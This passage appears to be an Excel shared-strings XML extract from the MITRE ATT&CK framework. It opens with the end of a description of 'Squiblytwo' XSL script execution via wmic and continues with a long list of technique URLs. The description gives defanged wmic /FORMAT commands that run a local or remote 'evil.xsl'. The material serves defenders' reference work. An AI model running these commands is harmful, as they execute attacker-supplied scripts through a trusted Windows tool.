Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1622</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/005</t>
  </si>
  <si>
